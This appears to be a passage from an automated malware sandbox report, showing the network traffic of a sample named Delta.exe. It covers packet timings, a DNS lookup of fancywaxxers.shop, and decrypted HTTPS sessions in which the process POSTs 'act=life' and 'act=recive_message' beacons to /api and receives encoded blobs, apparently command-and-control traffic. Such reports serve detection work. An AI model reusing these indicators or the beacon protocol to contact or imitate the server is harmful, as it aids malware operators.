Dec 31, 2024 17:21:15.005666971 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.444792032 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.444885969 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.444987059 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.446499109 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.446511984 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.446553946 CET	49730	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.446557999 CET	443	49730	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.456770897 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.456819057 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.456897020 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.457180023 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.457190037 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.933697939 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.933779955 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.949858904 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.949872971 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.950099945 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:15.951812983 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.951849937 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:15.951877117 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.398931026 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.398994923 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.399024010 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.399063110 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.399099112 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.399136066 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.399153948 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.399153948 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.399173975 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.399184942 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.399504900 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.399550915 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.399557114 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.403695107 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.403733969 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.403748035 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.403753996 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.403871059 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.489353895 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.489531994 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.489562988 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.489658117 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.489660025 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.489717960 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.489861012 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.489872932 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.489882946 CET	49731	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.489891052 CET	443	49731	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.654648066 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.654679060 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:16.654762030 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.655112028 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:16.655122042 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.121776104 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.121915102 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.123245955 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.123253107 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.123511076 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.124816895 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.124969959 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.124998093 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.125057936 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.125063896 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.787323952 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.787401915 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.787447929 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.787636995 CET	49732	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.787647963 CET	443	49732	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.877238035 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.877300024 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:17.877378941 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.877696037 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:17.877713919 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:18.350404978 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:18.350781918 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:18.442691088 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:18.442724943 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:18.443033934 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:18.447894096 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:18.448641062 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:18.448676109 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:18.929927111 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:18.930002928 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:18.930063009 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:18.930283070 CET	49733	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:18.930305958 CET	443	49733	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:19.159235954 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:19.159269094 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:19.159357071 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:19.159708977 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:19.159715891 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:19.634903908 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:19.635018110 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:19.636378050 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:19.636384010 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:19.636584044 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:19.637835979 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:19.637949944 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:19.637968063 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:19.638030052 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:19.638035059 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:20.298890114 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:20.298965931 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:20.299091101 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:20.299295902 CET	49734	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:20.299308062 CET	443	49734	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:20.617959023 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:20.618030071 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:20.618904114 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:20.619651079 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:20.619668007 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.084779024 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.084858894 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.086087942 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.086100101 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.086304903 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.087622881 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.087707043 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.087712049 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.541987896 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.542083979 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.542140007 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.542352915 CET	49735	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.542366982 CET	443	49735	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.983285904 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.983342886 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:21.983462095 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.983805895 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:21.983825922 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.466312885 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.466515064 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.468065023 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.468074083 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.468327045 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.482531071 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.483257055 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.483289003 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.483381987 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.483422995 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.483534098 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.483572960 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.483711004 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.483732939 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.483890057 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.483907938 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.484077930 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.484097958 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.484107018 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.484268904 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.484291077 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.493307114 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.493486881 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.493510962 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.493535995 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.493547916 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.493670940 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.493696928 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.498631954 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:22.498756886 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:22.498778105 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.069005013 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.069092035 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.069156885 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.069369078 CET	49736	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.069386959 CET	443	49736	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.116734028 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.116780043 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.116867065 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.117181063 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.117193937 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.584203959 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.584266901 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.585871935 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.585880995 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.586208105 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:24.587620020 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.587639093 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:24.587743044 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.028255939 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.028299093 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.028321981 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.028346062 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.028373003 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.028394938 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.028515100 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:25.028515100 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:25.028538942 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.029159069 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.029206991 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:25.029213905 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.032974958 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.033003092 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.033027887 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:25.033034086 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.033082962 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:25.033087015 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.033096075 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.033138037 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:25.033281088 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:25.033293962 CET	443	49737	104.21.96.1	192.168.2.4
Dec 31, 2024 17:21:25.033318043 CET	49737	443	192.168.2.4	104.21.96.1
Dec 31, 2024 17:21:25.033324003 CET	443	49737	104.21.96.1	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:21:14.445250034 CET	59757	53	192.168.2.4	1.1.1.1
Dec 31, 2024 17:21:14.457431078 CET	53	59757	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 17:21:14.445250034 CET	192.168.2.4	1.1.1.1	0x942e	Standard query (0)	fancywaxxers.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 17:21:14.457431078 CET	1.1.1.1	192.168.2.4	0x942e	No error (0)	fancywaxxers.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:21:14.457431078 CET	1.1.1.1	192.168.2.4	0x942e	No error (0)	fancywaxxers.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:21:14.457431078 CET	1.1.1.1	192.168.2.4	0x942e	No error (0)	fancywaxxers.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:21:14.457431078 CET	1.1.1.1	192.168.2.4	0x942e	No error (0)	fancywaxxers.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:21:14.457431078 CET	1.1.1.1	192.168.2.4	0x942e	No error (0)	fancywaxxers.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:21:14.457431078 CET	1.1.1.1	192.168.2.4	0x942e	No error (0)	fancywaxxers.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:21:14.457431078 CET	1.1.1.1	192.168.2.4	0x942e	No error (0)	fancywaxxers.shop	104.21.32.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.96.1	443	7396	C:\Users\user\Desktop\Delta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:21:15 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2024-12-31 16:21:15 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-31 16:21:15 UTC	1133	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:21:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jh3iegr0v95naak8liic7scga6; expires=Sat, 26 Apr 2025 10:07:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ICAC394gSerGPxQUa8N00ks8f5%2BFPdEcqAdg%2FNd31VPKoRJwr0Y3QGgrxf8opBKHgEvBY2bYw%2FrZQ3GEUG4z06xw%2FR2gf75Lyk4Se9kaouF2OiXQpFFvqNXrOKKqhgmG%2FgZcAw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9a0118bede9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1567&min_rtt=1557&rtt_var=604&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1781574&cwnd=209&unsent_bytes=0&cid=32fe4a71ad5b2d69&ts=518&x=0"
2024-12-31 16:21:15 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-31 16:21:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	104.21.96.1	443	7396	C:\Users\user\Desktop\Delta.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:21:15 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 51 Host: fancywaxxers.shop
2024-12-31 16:21:15 UTC	51	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 39 31 34 35 31 30 39 38 30 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--914510980&j=
2024-12-31 16:21:16 UTC	1135	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:21:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=1nt5f9duoedmetb5a09ncdpbc6; expires=Sat, 26 Apr 2025 10:07:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5maJoPc47qDEEKYY2paut%2BvNSAfD1yoWtA9a3Hi%2Fe6wHawzC25WD%2FHALJaXgrfSj%2F6aIiXdO98yKKyiW8E3gFiSbbnnZ43g%2BVRJc1wMKATgT8%2BOchil2w0bpbP3TTqOFWkRr8g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fab9a070d1b42c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1660&min_rtt=1654&rtt_var=634&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=952&delivery_rate=1708601&cwnd=212&unsent_bytes=0&cid=7296eb98da7145a1&ts=472&x=0"
2024-12-31 16:21:16 UTC	234	IN	Data Raw: 31 63 61 62 0d 0a 54 45 43 65 53 5a 79 32 77 6c 69 47 7a 6e 70 46 4b 4b 71 71 7a 69 39 44 57 32 59 64 68 76 42 63 4d 63 55 44 4d 76 53 63 76 65 30 33 59 75 68 72 70 6f 4c 75 65 76 57 72 57 48 39 63 32 4e 2b 72 41 32 45 36 41 6a 2b 38 6c 6a 31 64 74 6d 59 65 31 75 72 51 7a 33 59 6d 2f 79 58 76 30 2b 35 36 34 37 5a 59 66 33 50 52 69 4b 74 42 59 57 46 45 65 4f 79 53 50 56 32 6e 59 6c 6d 62 37 4e 47 4f 4a 43 7a 35 49 66 6e 56 70 6a 6e 71 6f 78 38 67 54 63 76 41 6f 45 59 75 4d 77 73 2f 71 74 49 35 53 2b 63 35 45 4c 6e 35 79 59 77 42 49 65 30 69 76 73 76 75 49 36 53 72 46 47 63 53 69 4d 75 72 54 53 38 39 41 6e 62 75 6d 44 52 56 70 6d 64 59 68 50 58 62 68 53 51 69 2b 69 44 7a 33 4c 49 30 34 4b 51 55 Data Ascii: 1cabTECeSZy2wliGznpFKKqqzi9DW2YdhvBcMcUDMvScve03YuhrpoLuevWrWH9c2N+rA2E6Aj+8lj1dtmYe1urQz3Ym/yXv0+5647ZYf3PRiKtBYWFEeOySPV2nYlmb7NGOJCz5IfnVpjnqox8gTcvAoEYuMws/qtI5S+c5ELn5yYwBIe0ivsvuI6SrFGcSiMurTS89AnbumDRVpmdYhPXbhSQi+iDz3LI04KQU
2024-12-31 16:21:16 UTC	1369	IN	Data Raw: 4a 6b 66 4c 69 4f 49 4e 4a 69 46 45 4a 36 54 42 44 46 43 32 63 45 57 62 37 74 6e 50 4d 57 7a 6c 61 2f 6e 59 34 47 4b 6b 70 42 51 70 54 38 76 48 71 30 77 68 4b 77 74 2f 35 35 6f 32 56 36 31 75 58 35 6e 77 31 59 67 6d 4b 2f 73 6b 2b 64 79 6d 4e 65 66 73 56 6d 64 4e 30 49 6a 30 44 51 45 70 42 33 7a 77 6e 79 38 54 75 43 39 4a 31 76 6e 54 7a 33 5a 69 2b 69 58 2f 32 61 41 6f 37 4b 63 54 49 6c 6a 44 77 61 46 41 49 54 51 4f 63 4f 65 53 4f 56 6d 74 62 6c 71 53 38 39 4b 4a 4c 69 4b 38 5a 62 37 54 75 48 71 38 37 44 73 69 57 73 2f 45 75 67 38 62 65 52 73 78 2f 64 49 35 58 2b 63 35 45 4a 37 37 33 49 77 6c 4c 66 38 6a 39 63 61 67 4b 4f 4b 68 48 54 56 4d 7a 63 61 6d 54 6a 4d 7a 43 6e 6e 6e 6d 7a 56 61 6f 6d 5a 55 31 72 43 66 69 44 5a 69 70 47 76 66 32 61 73 32 37 72 73 Data Ascii: JkfLiOINJiFEJ6TBDFC2cEWb7tnPMWzla/nY4GKkpBQpT8vHq0whKwt/55o2V61uX5nw1YgmK/sk+dymNefsVmdN0Ij0DQEpB3zwny8TuC9J1vnTz3Zi+iX/2aAo7KcTIljDwaFAITQOcOeSOVmtblqS89KJLiK8Zb7TuHq87DsiWs/Eug8beRsx/dI5X+c5EJ773IwlLf8j9cagKOKhHTVMzcamTjMzCnnnmzVaomZU1rCfiDZipGvf2as27rs
2024-12-31 16:21:16 UTC	1369	IN	Data Raw: 74 71 73 51 54 4d 31 44 6e 6e 72 6e 7a 49 54 36 53 46 58 6a 72 36 48 7a 77 51 68 36 43 6a 30 6c 70 55 35 36 71 49 66 4d 51 72 58 68 72 55 4e 4a 6a 56 45 4a 36 53 66 50 31 75 68 63 31 2b 62 2f 64 47 42 49 53 66 7a 49 2f 37 55 72 54 2f 67 70 78 4d 6b 52 38 7a 61 70 6b 30 70 50 41 56 31 37 74 4a 77 45 36 42 35 45 4d 36 2b 37 70 67 6c 59 4d 6b 6f 38 4e 71 6e 4c 4b 53 7a 56 6a 34 4b 7a 38 54 73 46 57 45 30 44 48 72 68 6e 54 39 5a 71 57 52 61 6d 76 62 52 6a 44 77 74 2b 43 76 79 33 4b 6f 33 36 71 67 51 4c 6b 48 44 7a 71 78 4d 4b 33 6c 4b 50 2b 4f 4b 66 67 76 6e 56 56 65 61 38 39 44 4e 47 79 48 79 4a 66 6e 43 34 43 57 71 74 56 67 67 52 6f 69 51 37 45 45 6f 4f 51 39 31 34 4a 49 35 58 71 4a 69 56 35 58 7a 32 49 55 67 4a 66 67 6e 39 39 6d 6d 4f 75 4f 6f 48 54 56 50 Data Ascii: tqsQTM1DnnrnzIT6SFXjr6HzwQh6Cj0lpU56qIfMQrXhrUNJjVEJ6SfP1uhc1+b/dGBISfzI/7UrT/gpxMkR8zapk0pPAV17tJwE6B5EM6+7pglYMko8NqnLKSzVj4Kz8TsFWE0DHrhnT9ZqWRamvbRjDwt+Cvy3Ko36qgQLkHDzqxMK3lKP+OKfgvnVVea89DNGyHyJfnC4CWqtVggRoiQ7EEoOQ914JI5XqJiV5Xz2IUgJfgn99mmOuOoHTVP
